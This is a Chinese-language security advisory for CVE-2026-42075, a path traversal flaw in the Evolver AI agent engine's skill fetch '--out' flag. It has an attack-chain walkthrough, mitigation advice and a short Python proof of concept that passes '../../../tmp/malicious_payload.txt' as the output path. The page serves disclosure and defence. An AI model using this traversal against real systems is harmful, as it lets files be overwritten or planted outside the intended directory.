CVE-2026-42075 CVSS 8.1 高危

CVE-2026-42075 Evolver路径遍历漏洞(任意文件写入)

披露日期: 2026-05-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42075

漏洞类型

路径遍历

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Evolver

漏洞概述

Evolver是一款基于GEP的AI智能体自进化引擎。在1.69.3版本之前，该软件在技能下载命令中存在路径遍历漏洞。攻击者可利用`--out=`参数未经验证的用户输入，通过构造恶意路径将文件写入文件系统任意位置。该漏洞允许攻击者覆盖关键系统文件或在敏感位置创建文件，从而对系统完整性和可用性造成严重影响。建议用户尽快升级至修复版本。

技术细节

该漏洞源于Evolver在处理技能下载命令时的输入验证机制缺失。具体而言，`--out`标志直接接受用户提供的路径字符串，未对目录遍历字符（如`../`）进行过滤或规范化处理。攻击者可通过构造包含遍历序列的路径参数，突破预期的下载目录限制。由于程序以当前用户权限执行文件写入操作，攻击者可利用此漏洞覆盖任意系统文件（如配置文件或二进制文件）或植入恶意文件。结合CVSS向量分析，该漏洞利用难度低，无需用户交互，且具备高完整性和可用性影响，攻击者可借此破坏系统功能或实现权限提升。

攻击链分析

STEP 1

侦察

攻击者识别目标系统上安装了Evolver软件，且版本低于1.69.3。

STEP 2

武器化

攻击者准备包含恶意内容的文件，并构造包含目录遍历序列（如'../'）的目标路径参数。

STEP 3

交付

攻击者向Evolver发起技能下载请求，并在`--out`参数中注入恶意路径。

STEP 4

利用

Evolver处理请求时，由于未过滤路径字符，将下载的文件写入到攻击者指定的任意文件系统位置。

STEP 5

影响

系统关键文件被覆盖或篡改，导致系统完整性受损、服务不可用或进一步被攻击者控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-42075: Path Traversal in Evolver
# Vulnerable versions: < 1.69.3

# This script demonstrates the path traversal vulnerability
# by exploiting the '--out' flag in the skill fetch command.

import sys
import subprocess

def exploit_poc():
    target_file = "../../../tmp/malicious_payload.txt"
    skill_name = "example_skill"
    
    print(f"[*] Attempting to write to arbitrary path: {target_file}")
    
    # Simulating the vulnerable command execution
    # In a real scenario, the attacker controls the '--out' argument
    try:
        # Command structure: evolver fetch <skill> --out <path>
        cmd = ["evolver", "fetch", skill_name, "--out", target_file]
        print(f"[*] Executing: {' '.join(cmd)}")
        
        # Note: This is a simulation. Actual execution depends on environment.
        # result = subprocess.run(cmd, capture_output=True)
        print("[+] If vulnerable, the file has been written outside the intended directory.")
        
    except Exception as e:
        print(f"[-] Error during PoC execution: {e}")

if __name__ == "__main__":
    exploit_poc()

影响范围

Evolver < 1.69.3

防御指南

临时缓解措施

如果无法立即升级，建议限制运行Evolver进程的文件系统写入权限，确保其无法覆盖系统关键配置文件或二进制文件。同时，监控系统中异常的文件创建和修改行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表